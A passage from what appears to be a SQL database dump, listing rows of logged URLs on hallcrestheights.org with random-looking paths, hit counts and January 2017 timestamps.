00:00:00'),(3413,'http://www.hallcrestheights.org/i20162628-vqjnyspv-holjp-eurrtpil-uourxiv-lbtr-hnnmt-qzkowt-sxpp-k28640-bgrrcdsi-kibkxnpf-ovpyay-bgoynk.htm',NULL,'','',1,0,'2017-01-08 23:34:33','0000-00-00 00:00:00'),(3414,'http://www.hallcrestheights.org/fadlajfn-lgfpc-vwgmyhde-cwxbdeu-i20162632-dkov-fiibp-tquhzx-chhr-k25220-mxagfpap-uhgfqvjd-clbbvz-grcmdf.htm',NULL,'','',1,0,'2017-01-08 23:36:19','0000-00-00 00:00:00'),(3415,'http://www.hallcrestheights.org/vqjnyspv-holjp-eurrtpil-uourxiv-lbtr-hnnmt-qzkowt-i20162635-sxpp-k38000-bgrrcdsi-kibkxnpf-ovpyay-bgoynk.htm',NULL,'','',1,0,'2017-01-08 23:38:16','0000-00-00 00:00:00'),(3416,'http://www.hallcrestheights.org/oiyizg-k17389-olrcmwfb-snop-dgfnh-skrl-i20162633-jrgfctf-zfiwxwm-akoay-osmpql/',NULL,'','',1,0,'2017-01-08 23:40:11','0000-00-00 00:00:00'),(3417,'http://www.hallcrestheights.org/ryvhrhmq-tyysl-lgeajanp-dmefnxh-i20162632-qfhj-dyhao-xrcjhw-uvds-k26120-vezytwlc-ycwscpua-kqnjtn-plyjup.htm',NULL,'','',1,0,'2017-01-08 23:42:07','0000-00-00 00:00:00'),(3418,'http://www.hallcrestheights.org/ixnmueah-whioz-hjxbnwpg-eyooayi-kuks-szqce-baqdom-i20162635-ytni-k37100-holbdent-afymluze-xtlfgg-csdimr.htm',NULL,'','',3,0,'2017-01-08 23:44:03','0000-00-00 00:00:00'),(3419,'http://www.hallcrestheights.org/xhajvq-i20162629-k24949-lwczbiqs-osqx-oqkgq-aqyd-cptznzv-tjqoevp-caqwj-aluwty/',NULL,'','',1,0,'2017-01-08 23:45:59','0000-00-00 00:00:00'),(3420,'http://www.hallcrestheights.org/i20162628-upttmnbe-atgrb-nqcdcncx-rdhcpgz-zdll-imvyx-jltfeo-bkeb-k29540-wivsmqkr-fbmlkmst-howgwh-lkjlbm.htm',NULL,'','',1,0,'2017-01-08 23:47:55','0000-00-00 00:00:00'),(3421,'http://www.hallcrestheights.org/mrcqgbei-fuwgr-abtnwyrq-semgwko-whme-mxgku-cybnpz-kicv-i20162636-k36380-ejxkulzj-cjkntsxj-lnuuuv-tffcgy.htm',NULL,'','',1,0,'2017-01-08 23:49:51','0000-00-00 00:00:00'),(3422,'http://www.hallcrestheights.org/gnfznxvj-xpalt-itjshkyj-yldpija-amdu-rtaen-i20162634-pggwtd-vlxt-k58700-dqkunfgl-qrhzyonx-feqnzs-vvbpzw.htm',NULL,'','',1,0,'2017-01-08 23:51:46','0000-00-00 00:00:00'),(3423,'http://www.hallcrestheights.org/dvisciwb-vwkux-krbzomsm-i20162631-vuclzup-hvqa-wuoxz-mnpzvs-gcrl-k39620-ycmczoqq-eludpwcm-egiapx-mxikii.htm',NULL,'','',1,0,'2017-01-08 23:55:39','0000-00-00 00:00:00'),(3424,'http://www.hallcrestheights.org/ajqx-i20162629-xucuzao-fifephi-ijimj-njbog-k37505-tsakbcc-gyfm-dvjuxzle-ktsls-hxosqq-jvfyo-ihttjpu/',NULL,'','',1,0,'2017-01-08 23:55:56','0000-00-00 00:00:00'),(3425,'http://www.hallcrestheights.org/oiyizgol-rcmw-fbsnopd-gfnhskrl-jrgfctfz-fiwx-wmak-i20162633-oayos-k18741-mpql-gvegdfv-gcrcbz/',NULL,'','',1,0,'2017-01-08 23:56:38','0000-00-00 00:00:00'),(3426,'http://www.hallcrestheights.org/mrcqg-beif/i20162636-k42854-uwgr-abtnwyrq-semgwkow-hmemxg.htm',NULL,'','',1,0,'2017-01-08 23:57:17','0000-00-00 00:00:00'),(3427,'http://www.hallcrestheights.org/i20162628-lugdltrs-mxxhy-pzqjllzo-hnjumnt-ecwf-ogywb-iwyrur-fgvf-k30440-cwqzhrib-nknyfeeb-sbjhfk-wetbro.htm',NULL,'','',1,0,'2017-01-08 23:57:36','0000-00-00 00:00:00'),(3428,'http://www.hallcrestheights.org/pcscq-rufu-k6014-npkw-xpoideot/wtvsoarm-i20162633-osmgep-lalhe-liyrqi-yqfuf-xvugowo-pegtqam-zimc.htm',NULL,'','',1,0,'2017-01-08 23:58:38','0000-00-00 00:00:00'),(3429,'http://www.hallcrestheights.org/i20162630-ajqxxuc-uzaof/ifephi-k47203-ijimjn-jbogt/',NULL,'','',1,0,'2017-01-08 23:59:19','0000-00-00 00:00:00'),(3430,'http://www.hallcrestheights.org/gnfz-nxvjxpa-i20162630-ltitj-shkyjy-ldpijaa-mdurtaen-pggwtdv-lxtdqkun-k23132-fglq-rhzyonxf-eqnzsvvb-pzwdhkv.htm',NULL,'','',1,0,'2017-01-08 23:59:31','0000-00-00 00:00:00'),(3431,'http://www.hallcrestheights.org/wbwp-bonkydh-xjjikvf-vtzpx-bxkcw-k18105-jybtylw-osdu-ieqgwsog-xhgpi-i20162629-sdhtni/',NULL,'','',1,0,'2017-01-08 23:59:59','0000-00-00 00:00:00'),(3432,'http://www.hallcrestheights.org/bsoapaz-apsta-sgmhcq-cmckfr/i20162630-dtfkg-pvbc-hsiwho-rklvzr-tjrsyoa-k34923-ayfwg-dxskm/',NULL,'','',1,0,'2017-01-09 00:00:40','0000-00-00 00:00:00'),(3433,'http://www.hallcrestheights.org/dvis-ciwbvwk-i20162630-uxkrb-zomsmv-uclzuph-vqawuoxz-mnpzvsg-crlycmcz-k43832-oqqe-ludpwcme-giapxmxi-kiinzqk.htm',NULL,'','',1,0,'2017-01-09 00:01:27','0000-00-00 00:00:00'),(3434,'http://www.hallcrestheights.org/htxwhy-krsvsvhu-i20162632-dykb-qxdos-fiet-yuaixnr-bdggsaa-rhefs-kjydmr-k28689-ujwi/',NULL,'','',2,0,'2017-01-09 00:02:07','0000-00-00 00:00:00'),(3435,'http://www.hallcrestheights.org/lugdltrs-mxxhy-k57350-pzqjllzo-hnjumnt/ecwf-ogywb-i20162634-iwyrur-fgvf-cwqzhrib-nknyfeeb-sbjhfk-wetbro.htm',NULL,'','',1,0,'2017-01-09 00:02:40','0000-00-00 00:00:00'),(3436,'http://www.hallcrestheights.org/i20162628-xhajvq-k48349-lwczbiqs-osqx-oqkgq-aqyd-cptznzv-tjqoevp-caqwj-aluwty/',NULL,'','',1,0,'2017-01-09 00:03:22','0000-00-00 00:00:00'),(3437,'http://www.hallcrestheights.org/lugdltrs-mxxhy-pzqjllzo/i20162628-hnjumnt-k7690-ecwf-ogywb-iwyrur.htm',NULL,'','',1,0,'2017-01-09 00:04:02','0000-00-00 00:00:00'),(3438,'http://www.hallcrestheights.org/kzpffm-i20162629-k35749-sxklrded-hwge-fvbbg-zagp-eciyyuw-uvfztji-gjina-mzbcng/',NULL,'','',2,0,'2017-01-09 00:04:42','0000-00-00 00:00:00'),(3439,'http://www.hallcrestheights.org/nfrkop-dobbumgo-lzes-rkwtz-qtqb-i20162629-k36549-svjcwjb-xnmyvss-sldjz/',NULL,'','',2,0,'2017-01-09 00:05:27','0000-00-00 00:00:00'),(3440,'http://www.hallcrestheights.org/lugd-ltrsmxx-hypzq-jllzoh-njumnte-cwfogywb-i20162634-iwyrurf-gvfcwqzh-k32312-ribn-knyfeebs-bjhfkwet-brovflt.htm',NULL,'','',1,0,'2017-01-09 00:07:15','0000-00-00 00:00:00'),(3441,'http://www.hallcrestheights.org/oiyizgo-k35173-lrcmw-i20162630-fbsnop-dgfnhs-krljr-gfct-fzfiwx-wmakoa-yosmpql/',NULL,'','',1,0,'2017-01-09 00:09:11','0000-00-00 00:00:00'),(3442,'http://www.hallcrestheights.org/vqjn-yspvhol-jpeur-rtpilu-ourxivl-i20162633-btrhnnmt-qzkowts-xppbgrrc-k53912-dsik-ibkxnpfo-vpyaybgo-ynkxnoq.htm',NULL,'','',1,0,'2017-01-09 00:13:03','0000-00-00 00:00:00'),(3443,'http://www.hallcrestheights.org/ryvh-rhmqtyy-sllge-ajanpd-mefnxhq-fhjdyhao-i20162634-xrcjhwu-vdsvezyt-k11612-wlcy-cwscpuak-qnjtnply-jupsujj.htm',NULL,'','',1,0,'2017-01-09 00:16:57','0000-00-00 00:00:00'),(3444,'http://www.hallcrestheights.org/i20162628-uptt-mnbeatg-rbnqc-dcncxr-dhcpgzz-dllimvyx-jltfeob-kebwivsm-k47792-qkrf-bmlkmsth-owgwhlkj-lbmrgir.htm',NULL,'','',2,0,'2017-01-09 00:20:47','0000-00-00 00:00:00'),(3445,'http://www.hallcrestheights.org/ixnm-ueahwhi-ozhjx-bnwpge-yooayik-i20162633-uksszqce-baqdomy-tniholbd-k53012-enta-fymluzex-tlfggcsd-imrmqfn.htm',NULL,'','',1,0,'2017-01-09 00:22:43','0000-00-00 00:00:00'),(3446,'http://www.hallcrestheights.org/k584-jglet-i20162637-kymd-rqzn-rvmlkswa.htm',NULL,'','',1,0,'2017-01-09 00:24:40','0000-00-00 00:00:00'),(3447,'http://www.hallcrestheights.org/cwhriwg-k61003-pekzq-dwkvum-i20162631-zbsaii/mjzfo-zgdv-ddqjvd-obknly-kconedw/',NULL,'','',1,0,'2017-01-09 00:25:40','0000-00-00 00:00:00'),(3448,'http://www.hallcrestheights.org/k1484-edzvd-i20162637-lqco-mnnm-mcawvbfu.htm',NULL,'','',1,0,'2017-01-09 00:26:38','0000-00-00 00:00:00'),(3449,'http://www.hallcrestheights.org/edzvdlqc-omnnm-mcawvbfu-japyvrl-flxh-qjkuh-kcmumb-hmgz-k60140-nkoheyru-i20162637-pxpudzik-musshe-qnrfwn.htm',NULL,'','',1,0,'2017-01-09 00:26:58','0000-00-00 00:00:00'),(3450,'http://www.hallcrestheights.org/soegsz-xyifetvt-i20162632-ndyu-uhvfc/yzls-xxqroxa-ehkskxy-xembu-qudtwq-k39939-ceyv/',NULL,'','',1,0,'2017-01-09 00:27:38','0000-00-00 00:00:00'),(3451,'http://www.hallcrestheights.org/i20162632-bsoapa-zapstasg/mhcq-k39239-cmckf/',NULL,'','',1,0,'2017-01-09 00:28:19','0000-00-00 00:00:00'),(3452,'http://www.hallcrestheights.org/i20162636-k52604-mrcqg-beif-uwgr-abtnwyrq.htm',NULL,'','',1,0,'2017-01-09 00:28:30','0000-00-00 00:00:00'),(3453,'http://www.hallcrestheights.org/ajqx-k5655-xucuzao-fifephi-i20162629-ijimj/njbog-tsakbcc-gyfm-dvjuxzle-ktsls-hxosqq-jvfyo/',NULL,'','',1,0,'2017-01-09 00:28:59','0000-00-00 00:00:00'),(3454,'http://www.hallcrestheights.org/wbwp-i20162629-bonkydh/xjjikvf-vtzpx-bxkcw-k49955-jybtylw/',NULL,'','',1,0,'2017-01-09 00:29:40','0000-00-00 00:00:00'),(3455,'http://www.hallcrestheights.org/i20162630-ryvh-rhmqtyy/k23182-sllge-ajanpd-mefnxhq.htm',NULL,'','',1,0,'2017-01-09 00:30:20','0000-00-00 00:00:00'),(3456,'http://www.hallcrestheights.org/i20162630-k6595-tkuy-kfjdnjj/bucyupa-jaylr-lwfvd/',NULL,'','',1,0,'2017-01-09 00:31:00','0000-00-00 00:00:00'),(3457,'http://www.hallcrestheights.org/bsoa-pazapst-asgmhcq-cmckf-rdtfk-k27045-gpvbchs-i20162630-iwho-rklvzrtj/',NULL,'','',1,0,'2017-01-09 00:31:51','0000-00-00 00:00:00'),(3458,'http://www.hallcrestheights.org/oiyizg-olrcmwfb/i20162636-snop-dgfnh-skrl-k10499-jrgfctf/',NULL,'','',1,0,'2017-01-09 00:32:21','0000-00-00 00:00:00'),(3459,'http://www.hallcrestheights.org/i20162636-k53504-dvisc-iwbv-wkux-krbzomsm.htm',NULL,'','',1,0,'2017-01-09 00:32:28','0000-00-00 00:00:00'),(3460,'http://www.hallcrestheights.org/i20162636-k11204-ixnmu-eahw-hioz-hjxbnwpg.htm',NULL,'','',1,0,'2017-01-09 00:34:20','0000-00-00 00:00:00'),(3461,'http://www.hallcrestheights.org/i20162636-k32804-gnfzn-xvjx-palt-itjshkyj.htm',NULL,'','',1,0,'2017-01-09 00:36:15','0000-00-00 00:00:00'),(3462,'http://www.hallcrestheights.org/k22184-mrcqg-i20162637-beif-uwgr-abtnwyrq.htm',NULL,'','',1,0,'2017-01-09 00:40:06','0000-00-00 00:00:00'),(3463,'http://www.hallcrestheights.org/i20162636-k31904-edzvd-lqco-mnnm-mcawvbfu.htm',NULL,'','',1,0,'2017-01-09 00:42:04','0000-00-00 00:00:00'),(3464,'http://www.hallcrestheights.org/htxwhyk-k36073-rsvsv-i20162630-hudykb-qxdosf-ietyu-aixn-rbdggs-aarhef-skjydmr/',NULL,'','',1,0,'2017-01-09 00:43:59','0000-00-00 00:00:00'),(3465,'http://www.hallcrestheights.org/k21284-ryvhr-i20162637-hmqt-yysl-lgeajanp.htm',NULL,'','',1,0,'2017-01-09 00:45:58','0000-00-00 00:00:00'),(3466,'http://www.hallcrestheights.org/i20162636-k61784-pcscq-rufu-npkw-xpoideot.htm',NULL,'','',1,0,'2017-01-09 00:47:52','0000-00-00 00:00:00'),(3467,'http://www.hallcrestheights.org/k37664-ryvhr-i20162633-hmqt-yysl-lgeajanp.htm',NULL,'','',1,0,'2017-01-09 00:49:47','0000-00-00 00:00:00'),(3468,'http://www.hallcrestheights.org/bsoapa-k39889-zapstasg-mhcq-cmckf-i20162632-rdtf-kgpvbch-siwhork-lvzrt-jrsyoa/',NULL,'','',1,0,'2017-01-09 00:51:42','0000-00-00 00:00:00'),(3469,'http://www.hallcrestheights.org/i20162632-k22184-mrcqg-beif-uwgr-abtnwyrq.htm',NULL,'','',1,0,'2017-01-09 00:55:49','0000-00-00 00:00:00'),(3470,'http://www.hallcrestheights.org/i20162636-k12104-vqjny-spvh-oljp-eurrtpil.htm',NULL,'','',1,0,'2017-01-09 00:57:40','0000-00-00 00:00:00'),(3471,'http://www.hallcrestheights.org/i20162632-k58364-lugdl-trsm-xxhy-pzqjllzo.htm',NULL,'','',1,0,'2017-01-09 00:59:27','0000-00-00 00:00:00'),(3472,'http://www.hallcrestheights.org/i20162636-k41084-upttm-nbea-tgrb-nqcdcncx.htm',NULL,'','',1,0,'2017-01-09 01:01:23','0000-00-00 00:00:00'),(3473,'http://www.hallcrestheights.org/wbwp-i20162629-k36955-bonkydh-xjjikvf-vtzpx/bxkcw-jybtylw-osdu-ieqgwsog-xhgpi/',NULL,'','',1,0,'2017-01-09 01:04:43','0000-00-00 00:00:00'),(3474,'http://www.hallcrestheights.org/i20162632-k21284-ryvhr-hmqt-yysl-lgeajanp.htm',NULL,'','',1,0,'2017-01-09 01:05:15','0000-00-00 00:00:00'),(3475,'http://www.hallcrestheights.org/yemb-i20162629-jvhtqqd-ckzfltz-terqb-wnswn-k28805-snjplpf/',NULL,'','',2,0,'2017-01-09 01:05:22','0000-00-00 00:00:00'),(3476,'http://www.hallcrestheights.org/i20162628-k2276-vqjnys-pvholj-peurrt-pilu.htm',NULL,'','',1,0,'2017-01-09 01:07:11','0000-00-00 00:00:00'),(3477,'http://www.hallcrestheights.org/i20162632-k59264-zmkue-dtzj-ivyo-qxifgxuh.htm',NULL,'','',1,0,'2017-01-09 01:09:07','0000-00-00 00:00:00'),(3478,'http://www.hallcrestheights.org/ajqxxucu-k62101-zaof-ifephii-i20162631-jimjnjbo-gtsakbcc-gyfm-dvju-xzlek-tsls/',NULL,'','',1,0,'2017-01-09 01:11:04','0000-00-00 00:00:00'),(3479,'http://www.hallcrestheights.org/i20162636-k41984-lugdl-trsm-xxhy-pzqjllzo.htm',NULL,'','',1,0,'2017-01-09 01:13:01','0000-00-00 00:00:00'),(3480,'http://www.hallcrestheights.org/i20162636-k42884-zmkue-dtzj-ivyo-qxifgxuh.htm',NULL,'','',1,0,'2017-01-09 01:14:54','0000-00-00 00:00:00'),(3481,'http://www.hallcrestheights.org/soegszxy-k55981-ifet-vtndyuu-hvfcyzls-xxqroxae-hksk-i20162634-xyxe-mbuqu-dtwq/',NULL,'','',1,0,'2017-01-09 01:17:09','0000-00-00 00:00:00'),(3482,'http://www.hallcrestheights.org/k20816-ryvhrh-mqtyys-llgeaj-i20162635-anpd.htm',NULL,'','',1,0,'2017-01-09 01:18:48','0000-00-00 00:00:00'),(3483,'http://www.hallcrestheights.org/k54332-gnfz-nxvjxpa-i20162630-ltitj-shkyjy.htm',NULL,'','',1,0,'2017-01-09 01:20:42','0000-00-00 00:00:00'),(3484,'http://www.hallcrestheights.org/cwhriwgp-k48601-ekzq-i20162630-dwkvumz-bsaiimjz-fozgdvdd-qjvd-obkn-lykco-nedw/',NULL,'','',1,0,'2017-01-09 01:22:39','0000-00-00 00:00:00'),(3485,'http://www.hallcrestheights.org/nfrkop-k10549-dobbumgo-lzes-rkwtz-qtqb-svjcwjb-xnmyvss-sldjz-i20162636-naahjb/',NULL,'','',1,0,'2017-01-09 01:26:33','0000-00-00 00:00:00'),(3486,'http://www.hallcrestheights.org/i20162628-k59192-ryvh-rhmqtyy-sllge-ajanpd.htm',NULL,'','',1,0,'2017-01-09 01:28:29','0000-00-00 00:00:00'),(3487,'http://www.hallcrestheights.org/i20162628-kzpffm-k47449-sxklrded-hwge-fvbbg-zagp-eciyyuw-uvfztji-gjina-mzbcng/',NULL,'','',1,0,'2017-01-09 01:32:27','0000-00-00 00:00:00'),(3488,'http://www.hallcrestheights.org/bsoapaz-k34273-apsta-i20162630-sgmhcq-cmckfr-dtfkg-pvbc-hsiwho-rklvzr-tjrsyoa/',NULL,'','',1,0,'2017-01-09 01:34:17','0000-00-00 00:00:00'),(3489,'http://www.hallcrestheights.org/i20162628-k37592-dvis-ciwbvwk-uxkrb-zomsmv.htm',NULL,'','',1,0,'2017-01-09 01:36:12','0000-00-00 00:00:00'),(3490,'http://www.hallcrestheights.org/k41912-fadl-ajfnlgf-i20162634-pcvwg-myhdec.htm',NULL,'','',1,0,'2017-01-09 01:38:06','0000-00-00 00:00:00'),(3491,'http://www.hallcrestheights.org/gnfzn-xvjx-k21884-palt-i20162637-itjshkyj-yldpijaa-mdurta.htm',NULL,'','',1,0,'2017-01-09 01:42:03','0000-00-00 00:00:00'),(3492,'http://www.hallcrestheights.org/wbwpbon-k54973-kydhx-i20162630-jjikvf-vtzpxb-xkcwj-ybty-lwosdu-ieqgws-ogxhgpi/',NULL,'','',1,0,'2017-01-09 01:43:54','0000-00-00 00:00:00'),(3493,'http://www.hallcrestheights.org/gnfzn-xvjx-k21884-palt-itjshkyj-i20162632-yldpijaa-mdurta.htm',NULL,'','',1,0,'2017-01-09 01:47:47','0000-00-00 00:00:00'),(3494,'http://www.hallcrestheights.org/edzvd-lqco-k37364-mnnm-mcawvbfu-japyvrlf-i20162633-lxhqjk.htm',NULL,'','',1,0,'2017-01-09 01:49:43','0000-00-00 00:00:00'),(3495,'http://www.hallcrestheights.org/mrcqg-beif-k58064-uwgr-abtnwyrq-i20162632-semgwkow-hmemxg.htm',NULL,'','',1,0,'2017-01-09 01:51:39','0000-00-00 00:00:00'),(3496,'http://www.hallcrestheights.org/kzpffmsx-k35281-klrd-edhwgef-vbbgzagp-eciyyuwu-vfzt-i20162634-jigj-inamz-bcng/',NULL,'','',1,0,'2017-01-09 01:53:36','0000-00-00 00:00:00'),(3497,'http://www.hallcrestheights.org/k7590-ixnmueah-whioz-i20162628-hjxbnwpg-eyooayi/kuks-szqce-baqdom-ytni-holbdent-afymluze-xtlfgg.htm',NULL,'','',1,0,'2017-01-09 01:56:40','0000-00-00 00:00:00'),(3498,'http://www.hallcrestheights.org/i20162632-dvisc-iwbv/k52334-wkux-krbzomsm.htm',NULL,'','',1,0,'2017-01-09 01:57:17','0000-00-00 00:00:00'),(3499,'http://www.hallcrestheights.org/k39355-tkuy-kfjdnjj/bucyupa-jaylr-i20162629-lwfvd/',NULL,'','',1,0,'2017-01-09 01:58:03','0000-00-00 00:00:00'),(3500,'http://www.hallcrestheights.org/ajqxxu-i20162636-cuzaofif/ephi-ijimj-k10699-njbo/',NULL,'','',1,0,'2017-01-09 01:58:38','0000-00-00 00:00:00'),(3501,'http://www.hallcrestheights.org/jglet-k5914-kymd-rqzn-rvmlkswa/zvkecqqn-i20162633-eeiaqj-zlnpl-qfcneb-xilnv.htm',NULL,'','',1,0,'2017-01-09 01:59:20','0000-00-00 00:00:00'),(3502,'http://www.hallcrestheights.org/fadla-jfnl-i20162636-k11804-gfpc-vwgmyhde-cwxbdeud-kovfii.htm',NULL,'','',1,0,'2017-01-09 01:59:23','0000-00-00 00:00:00'),(3503,'http://www.hallcrestheights.org/lugdl-trsm-i20162632-xxhy-pzqjllzo/k53034-hnjumnte-cwfogy-wbiwy-rurfgv-fcwqz-hribnkn.htm',NULL,'','',1,0,'2017-01-09 02:00:00','0000-00-00 00:00:00'),(3504,'http://www.hallcrestheights.org/edzvdl-qcomnn-i20162634-k51066-mmcawv/bfuj-apyvrl-flxhqj-kuhkc-mumbhmg.htm',NULL,'','',1,0,'2017-01-09 02:00:40','0000-00-00 00:00:00'),(3505,'http://www.hallcrestheights.org/htxwhy-k18289-krsvsvhu-dykb-qxdos-fiet-i20162633-yuaixnr-bdggsaa-rhefs-kjydmr/',NULL,'','',1,0,'2017-01-09 02:01:19','0000-00-00 00:00:00'),(3506,'http://www.hallcrestheights.org/pcscq-rufu-k1334-npkw-xpoideot/wtvsoarm-osmgep-lalhe-liyrqi-yqfuf-i20162637-xvugowo-pegtqam-zimc.htm',NULL,'','',1,0,'2017-01-09 02:01:26','0000-00-00 00:00:00'),(3507,'http://www.hallcrestheights.org/htxw-hykrsvs-vhudykb-qxdos/fiety-k16755-uaixnrb-dggs-aarhefsk-jydmr-i20162629-ujwimj/',NULL,'','',1,0,'2017-01-09 02:02:02','0000-00-00 00:00:00'),(3508,'http://www.hallcrestheights.org/htxwhy-krsvsvhu/dykb-i20162635-k38699-qxdos/',NULL,'','',1,0,'2017-01-09 02:02:42','0000-00-00 00:00:00'),(3509,'http://www.hallcrestheights.org/ajqxxu-cuzaofif-ephi-ijimj-njbo-gtsakbc-k38649-cgyfmdv-juxzl-ektsls-i20162635-hxos-qqjvfyoi/',NULL,'','',1,0,'2017-01-09 02:03:25','0000-00-00 00:00:00'),(3510,'http://www.hallcrestheights.org/i20162632-kzpffm-sxklrded-hwge-fvbbg-zagp-k28989-eciyyuw-uvfztji-gjina/',NULL,'','',2,0,'2017-01-09 02:04:02','0000-00-00 00:00:00'),(3511,'http://www.hallcrestheights.org/gnfz-nxvjxpa-ltitj-shkyjy/ldpijaa-k42762-mdurtaen-pggwtdv-lxtdqkun-i20162634-fglq-rhzyonxf-eqnzsvvb.htm',NULL,'','',1,0,'2017-01-09 02:04:42','0000-00-00 00:00:00'),(3512,'http://www.hallcrestheights.org/vqjny-spvh-k17564-oljp-eurrtpil-uourxivl-i20162633-btrhnn.htm',NULL,'','',1,0,'2017-01-09 02:07:07','0000-00-00 00:00:00'),(3513,'http://www.hallcrestheights.org/dvisc-iwbv-i20162636-k42584-wkux-krbzomsm-vuclzuph-vqawuo.htm',NULL,'','',1,0,'2017-01-09 02:09:03','0000-00-00 00:00:00'),(3514,'http://www.hallcrestheights.org/mrcqgbei-fuwgr-i20162636-k5180-abtnwyrq-semgwko-whme-mxgku.htm',NULL,'','',1,0,'2017-01-09 02:13:00','0000-00-00 00:00:00'),(3515,'http://www.hallcrestheights.org/pcscqruf-i20162635-unpkw-k5000-xpoideot-wtvsoar-mosm-gepla.htm',NULL,'','',1,0,'2017-01-09 02:14:53','0000-00-00 00:00:00'),(3516,'http://www.hallcrestheights.org/zmkuedtz-jivyo-k51620-qxifgxuh-i20162631-xptvuhm-iwnz-korpv.htm',NULL,'','',1,0,'2017-01-09 02:18:43','0000-00-00 00:00:00'),(3517,'http://www.hallcrestheights.org/i20162628-pcsc-qrufunp-k37292-kwxpo-ideotw-tvsoarm-osmgepla.htm',NULL,'','',1,0,'2017-01-09 02:20:39','0000-00-00 00:00:00'),(3518,'http://www.hallcrestheights.org/cwhriw-i20162629-gpekzqdw-kvum-zbsai-imjz-k4349-fozgdvd-dqjvdob-knlyk-conedw-jmax-evortbzq-saxidihg/',NULL,'','',1,0,'2017-01-09 02:21:38','0000-00-00 00:00:00'),(3519,'http://www.hallcrestheights.org/ixnm-ueahwhi-k42612-ozhjx-bnwpge-i20162634-yooayik-uksszqce-baqdomy-tniholbd-enta-fymluzex.htm',NULL,'','',1,0,'2017-01-09 02:22:14','0000-00-00 00:00:00'),(3520,'http://www.hallcrestheights.org/uptt-mnbeatg-i20162630-k54032-rbnqc-dcncxr-dhcpgzz-dllimvyx.htm',NULL,'','',1,0,'2017-01-09 02:22:34','0000-00-00 00:00:00'),(3521,'http://www.hallcrestheights.org/k60753-tkuykfj-dnjjb-ucyupa-jaylrl-wfvdy-i20162631-ruqp-klsdef-hxdfpd-fufpfaj-npvza-ttuxd/',NULL,'','',1,0,'2017-01-09 02:22:55','0000-00-00 00:00:00'),(3522,'http://www.hallcrestheights.org/i20162632-soegsz-k28889-xyifetvt-ndyu-uhvfc/',NULL,'','',2,0,'2017-01-09 02:23:36','0000-00-00 00:00:00'),(3523,'http://www.hallcrestheights.org/ixnmue-k51166-ahwhio-zhjxbn-wpge/yooayi-kukssz-i20162634-qceba-qdomytn-iholbde.htm',NULL,'','',1,0,'2017-01-09 02:24:15','0000-00-00 00:00:00'),(3524,'http://www.hallcrestheights.org/zmkuedtz-jivyo-k16520-qxifgxuh-xptvuhm-i20162632-iwnz-korpv.htm',NULL,'','',1,0,'2017-01-09 02:24:31','0000-00-00 00:00:00'),(3525,'http://www.hallcrestheights.org/edzv-dlqcomn-k10662-nmmca-wvbfuj/i20162634-apyvrlf-lxhqjkuh-kcmumbh-mgznkohe-yrup-xpudzikm.htm',NULL,'','',1,0,'2017-01-09 02:24:59','0000-00-00 00:00:00'),(3526,'http://www.hallcrestheights.org/vqjny-spvh/k42134-oljp-eurrtpil-i20162632-uourxivl-btrhnn.htm',NULL,'','',1,0,'2017-01-09 02:26:18','0000-00-00 00:00:00'),(3527,'http://www.hallcrestheights.org/ajqxxu-cuzaofif-ephi-ijimj/i20162632-njbo-gtsakbc-cgyfmdv-juxzl-ektsls-hxos-qqjvfyoi-k49439-httjputl/',NULL,'','',1,0,'2017-01-09 02:27:04','0000-00-00 00:00:00'),(3528,'http://www.hallcrestheights.org/ajqxxu-i20162635-cuzaofif/ephi-ijimj-njbo-k39299-gtsakbc/',NULL,'','',1,0,'2017-01-09 02:28:18','0000-00-00 00:00:00'),(3529,'http://www.hallcrestheights.org/i20162628-jgle-tkymdrq-k57992-znrvm-lkswaz-vkecqqn-eeiaqjzl.htm',NULL,'','',1,0,'2017-01-09 02:30:23','0000-00-00 00:00:00'),(3530,'http://www.hallcrestheights.org/i20162634-edzv-dlqcomn-k42512-nmmca-wvbfuj-apyvrlf-lxhqjkuh.htm',NULL,'','',1,0,'2017-01-09 02:32:15','0000-00-00 00:00:00'),(3531,'http://www.hallcrestheights.org/i20162628-ixnm-ueahwhi-k38192-ozhjx-bnwpge-yooayik-uksszqce.htm',NULL,'','',1,0,'2017-01-09 02:34:10','0000-00-00 00:00:00'),(3532,'http://www.hallcrestheights.org/wbwpbonk-k34381-ydhx-jjikvfv-tzpxbxkc-wjybtylw-osdu-i20162634-ieqg-wsogx-hgpi/',NULL,'','',1,0,'2017-01-09 02:36:07','0000-00-00 00:00:00'),(3533,'http://www.hallcrestheights.org/i20162634-pcsc-qrufunp-k20912-kwxpo-ideotw-tvsoarm-osmgepla.htm',NULL,'','',1,0,'2017-01-09 02:38:03','0000-00-00 00:00:00'),(3534,'http://www.hallcrestheights.org/i20162628-uptt-mnbeatg-k16592-rbnqc-dcncxr-dhcpgzz-dllimvyx.htm',NULL,'','',1,0,'2017-01-09 02:39:59','0000-00-00 00:00:00'),(3535,'http://www.hallcrestheights.org/ryvhrhmq-tyysl-k60440-lgeajanp-i20162637-dmefnxh-qfhj-dyhao.htm',NULL,'','',1,0,'2017-01-09 02:41:57','0000-00-00 00:00:00'),(3536,'http://www.hallcrestheights.org/xhajvql-k56773-wczbi-i20162630-qsosqx-oqkgqa-qydcp-tznz-vtjqoe-vpcaqw-jaluwty/',NULL,'','',1,0,'2017-01-09 02:45:53','0000-00-00 00:00:00'),(3537,'http://www.hallcrestheights.org/pcscqruf-unpkw-k35420-xpoideot-wtvsoar-i20162632-mosm-gepla.htm',NULL,'','',1,0,'2017-01-09 02:47:42','0000-00-00 00:00:00'),(3538,'http://www.hallcrestheights.org/upttmnbe-atgrb-k49820-nqcdcncx-i20162631-rdhcpgz-zdll-imvyx.htm',NULL,'','',1,0,'2017-01-09 02:49:39','0000-00-00 00:00:00'),(3539,'http://www.hallcrestheights.org/i20162628-gnfznxvj-xpalt-k18140-itjshkyj-yldpija-amdu-rtaen.htm',NULL,'','',1,0,'2017-01-09 02:53:32','0000-00-00 00:00:00'),(3540,'http://www.hallcrestheights.org/mrcq-gbeifuw-k63212-grabt-nwyrqs-emgwkow-i20162633-hmemxgku.htm',NULL,'','',1,0,'2017-01-09 02:55:28','0000-00-00 00:00:00'),(3541,'http://www.hallcrestheights.org/qlbowc-k19189-iggeceay-afxr-glnik-ghhm-i20162633-bbxpges-mrcaizt-biauw-dtvixp/',NULL,'','',1,0,'2017-01-09 02:57:26','0000-00-00 00:00:00'),(3542,'http://www.hallcrestheights.org/cwhriw-gpekzqdw-kvum-zbsai-i20162629-k14749-imjz/',NULL,'','',1,0,'2017-01-09 02:59:19','0000-00-00 00:00:00'),(3543,'http://www.hallcrestheights.org/edzvdlqc-omnnm-k57020-mcawvbfu-japyvrl-i20162632-flxh-qjkuh.htm',NULL,'','',1,0,'2017-01-09 02:59:20','0000-00-00 